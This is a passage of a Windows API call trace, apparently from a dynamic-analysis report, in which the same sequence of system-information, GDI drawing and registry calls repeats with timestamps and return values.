lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.806] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.806] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.806] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.806] BeginPath (hdc=0x0) returned 0 [0087.806] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.806] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.806] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.806] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.806] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.806] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.806] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.806] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.806] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdd0401d0 [0087.807] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdf0401cd [0087.807] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bfd [0087.807] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bfe [0087.807] CombineRgn (hrgnDst=0x1040bfd, hrgnSrc1=0xdd0401d0, hrgnSrc2=0xdf0401cd, iMode=1) returned 1 [0087.807] CombineRgn (hrgnDst=0x1040bfe, hrgnSrc1=0xdd0401d0, hrgnSrc2=0xdf0401cd, iMode=4) returned 2 [0087.807] CreateSolidBrush (color=0xff) returned 0x2100bfc [0087.807] CreateSolidBrush (color=0xff0000) returned 0x1100bff [0087.807] DeleteObject (ho=0x1100bff) returned 1 [0087.807] DeleteObject (ho=0xdf0401cd) returned 1 [0087.807] DeleteObject (ho=0xdd0401d0) returned 1 [0087.807] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.807] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.807] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.807] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.807] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.807] BeginPath (hdc=0x0) returned 0 [0087.807] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.807] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.807] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.807] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.807] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.807] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.807] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.807] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.807] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe00401cd [0087.807] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xde0401d0 [0087.807] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c00 [0087.807] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c01 [0087.807] CombineRgn (hrgnDst=0x1040c00, hrgnSrc1=0xe00401cd, hrgnSrc2=0xde0401d0, iMode=1) returned 1 [0087.807] CombineRgn (hrgnDst=0x1040c01, hrgnSrc1=0xe00401cd, hrgnSrc2=0xde0401d0, iMode=4) returned 2 [0087.807] CreateSolidBrush (color=0xff) returned 0x2100bff [0087.807] CreateSolidBrush (color=0xff0000) returned 0x1100c02 [0087.807] DeleteObject (ho=0x1100c02) returned 1 [0087.807] DeleteObject (ho=0xde0401d0) returned 1 [0087.807] DeleteObject (ho=0xe00401cd) returned 1 [0087.807] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.807] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.807] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.807] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.808] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.808] BeginPath (hdc=0x0) returned 0 [0087.808] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.808] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.808] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.808] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.808] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.808] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.808] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.808] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.808] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdf0401d0 [0087.808] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe10401cd [0087.808] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c03 [0087.808] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c04 [0087.808] CombineRgn (hrgnDst=0x1040c03, hrgnSrc1=0xdf0401d0, hrgnSrc2=0xe10401cd, iMode=1) returned 1 [0087.808] CombineRgn (hrgnDst=0x1040c04, hrgnSrc1=0xdf0401d0, hrgnSrc2=0xe10401cd, iMode=4) returned 2 [0087.808] CreateSolidBrush (color=0xff) returned 0x2100c02 [0087.808] CreateSolidBrush (color=0xff0000) returned 0x1100c05 [0087.808] DeleteObject (ho=0x1100c05) returned 1 [0087.808] DeleteObject (ho=0xe10401cd) returned 1 [0087.808] DeleteObject (ho=0xdf0401d0) returned 1 [0087.808] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.808] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.808] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.808] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.808] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.808] BeginPath (hdc=0x0) returned 0 [0087.808] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.808] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.808] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.808] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.808] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.808] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.808] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.808] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.808] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe20401cd [0087.808] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe00401d0 [0087.808] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c06 [0087.809] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c07 [0087.809] CombineRgn (hrgnDst=0x1040c06, hrgnSrc1=0xe20401cd, hrgnSrc2=0xe00401d0, iMode=1) returned 1 [0087.809] CombineRgn (hrgnDst=0x1040c07, hrgnSrc1=0xe20401cd, hrgnSrc2=0xe00401d0, iMode=4) returned 2 [0087.809] CreateSolidBrush (color=0xff) returned 0x2100c05 [0087.809] CreateSolidBrush (color=0xff0000) returned 0x1100c08 [0087.809] DeleteObject (ho=0x1100c08) returned 1 [0087.809] DeleteObject (ho=0xe00401d0) returned 1 [0087.809] DeleteObject (ho=0xe20401cd) returned 1 [0087.809] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.809] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.809] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.809] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.809] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.809] BeginPath (hdc=0x0) returned 0 [0087.809] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.809] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.809] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.809] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.809] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.809] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.809] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.809] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.809] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe10401d0 [0087.809] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe30401cd [0087.809] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c09 [0087.809] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c0a [0087.809] CombineRgn (hrgnDst=0x1040c09, hrgnSrc1=0xe10401d0, hrgnSrc2=0xe30401cd, iMode=1) returned 1 [0087.809] CombineRgn (hrgnDst=0x1040c0a, hrgnSrc1=0xe10401d0, hrgnSrc2=0xe30401cd, iMode=4) returned 2 [0087.809] CreateSolidBrush (color=0xff) returned 0x2100c08 [0087.809] CreateSolidBrush (color=0xff0000) returned 0x1100c0b [0087.809] DeleteObject (ho=0x1100c0b) returned 1 [0087.809] DeleteObject (ho=0xe30401cd) returned 1 [0087.809] DeleteObject (ho=0xe10401d0) returned 1 [0087.809] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.809] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.809] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.809] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.810] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.810] BeginPath (hdc=0x0) returned 0 [0087.810] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.810] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.810] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.810] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.810] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.810] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.810] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.810] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.810] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe40401cd [0087.810] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe20401d0 [0087.810] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c0c [0087.810] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c0d [0087.810] CombineRgn (hrgnDst=0x1040c0c, hrgnSrc1=0xe40401cd, hrgnSrc2=0xe20401d0, iMode=1) returned 1 [0087.810] CombineRgn (hrgnDst=0x1040c0d, hrgnSrc1=0xe40401cd, hrgnSrc2=0xe20401d0, iMode=4) returned 2 [0087.810] CreateSolidBrush (color=0xff) returned 0x2100c0b [0087.810] CreateSolidBrush (color=0xff0000) returned 0x1100c0e [0087.810] DeleteObject (ho=0x1100c0e) returned 1 [0087.810] DeleteObject (ho=0xe20401d0) returned 1 [0087.810] DeleteObject (ho=0xe40401cd) returned 1 [0087.810] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.810] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.810] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.810] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.810] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.810] BeginPath (hdc=0x0) returned 0 [0087.810] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.810] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.810] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.810] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.810] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.810] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.810] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.810] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.810] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe30401d0 [0087.810] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe50401cd [0087.810] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c0f [0087.810] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c10 [0087.811] CombineRgn (hrgnDst=0x1040c0f, hrgnSrc1=0xe30401d0, hrgnSrc2=0xe50401cd, iMode=1) returned 1 [0087.811] CombineRgn (hrgnDst=0x1040c10, hrgnSrc1=0xe30401d0, hrgnSrc2=0xe50401cd, iMode=4) returned 2 [0087.811] CreateSolidBrush (color=0xff) returned 0x2100c0e [0087.811] CreateSolidBrush (color=0xff0000) returned 0x1100c11 [0087.811] DeleteObject (ho=0x1100c11) returned 1 [0087.811] DeleteObject (ho=0xe50401cd) returned 1 [0087.811] DeleteObject (ho=0xe30401d0) returned 1 [0087.811] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.811] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.811] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.811] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.811] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.811] BeginPath (hdc=0x0) returned 0 [0087.811] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.811] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.811] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.811] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.811] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.811] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.811] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.811] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.811] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe60401cd [0087.811] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe40401d0 [0087.811] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c12 [0087.811] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c13 [0087.811] CombineRgn (hrgnDst=0x1040c12, hrgnSrc1=0xe60401cd, hrgnSrc2=0xe40401d0, iMode=1) returned 1 [0087.811] CombineRgn (hrgnDst=0x1040c13, hrgnSrc1=0xe60401cd, hrgnSrc2=0xe40401d0, iMode=4) returned 2 [0087.811] CreateSolidBrush (color=0xff) returned 0x2100c11 [0087.811] CreateSolidBrush (color=0xff0000) returned 0x1100c14 [0087.811] DeleteObject (ho=0x1100c14) returned 1 [0087.811] DeleteObject (ho=0xe40401d0) returned 1 [0087.811] DeleteObject (ho=0xe60401cd) returned 1 [0087.811] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.811] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.811] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.811] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.811] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.811] BeginPath (hdc=0x0) returned 0 [0087.811] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.812] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.812] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.812] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.812] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.812] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.812] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.812] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.812] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe50401d0 [0087.812] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe70401cd [0087.812] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c15 [0087.812] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c16 [0087.812] CombineRgn (hrgnDst=0x1040c15, hrgnSrc1=0xe50401d0, hrgnSrc2=0xe70401cd, iMode=1) returned 1 [0087.812] CombineRgn (hrgnDst=0x1040c16, hrgnSrc1=0xe50401d0, hrgnSrc2=0xe70401cd, iMode=4) returned 2 [0087.812] CreateSolidBrush (color=0xff) returned 0x2100c14 [0087.812] CreateSolidBrush (color=0xff0000) returned 0x1100c17 [0087.812] DeleteObject (ho=0x1100c17) returned 1 [0087.812] DeleteObject (ho=0xe70401cd) returned 1 [0087.812] DeleteObject (ho=0xe50401d0) returned 1 [0087.812] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.812] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.812] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.812] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.812] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.812] BeginPath (hdc=0x0) returned 0 [0087.812] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.812] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.812] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: 